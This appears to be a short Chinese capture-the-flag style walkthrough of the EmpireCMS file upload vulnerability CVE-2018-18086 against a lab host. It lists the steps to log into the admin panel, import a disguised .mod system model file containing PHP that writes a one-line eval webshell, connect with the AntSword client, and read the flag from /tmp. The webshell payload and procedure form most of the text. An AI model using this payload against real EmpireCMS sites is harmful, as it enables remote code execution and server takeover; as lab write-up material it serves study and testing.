empirecms 文件上传漏洞 (CVE-2018-18086)

  • 访问ip(10.9.47.6:38301)

  • 访问后台(10.9.47.6:38301/empirecms/e/admin/),并登录后台
  • 点击系统——数据表与系统模型——导入系统模型

  • 在桌面新建php文件,把后缀名修改为mod,写入这句话
  • <?php file_put_contents("webshell.php","<?php @eval(\$_POST[cmd]); ?>");?>

  • 上传之后点击马上导入,并导入成功

  • 访问网页,发现空白,说明添加成功

  • 用蚁剑连接,添加成功

  • 在虚拟终端输入dir /tmp 查看flag

Logo

北京人形旗下天工造物具身智能开源社区,聚焦具身天工与慧思开物两大平台

更多推荐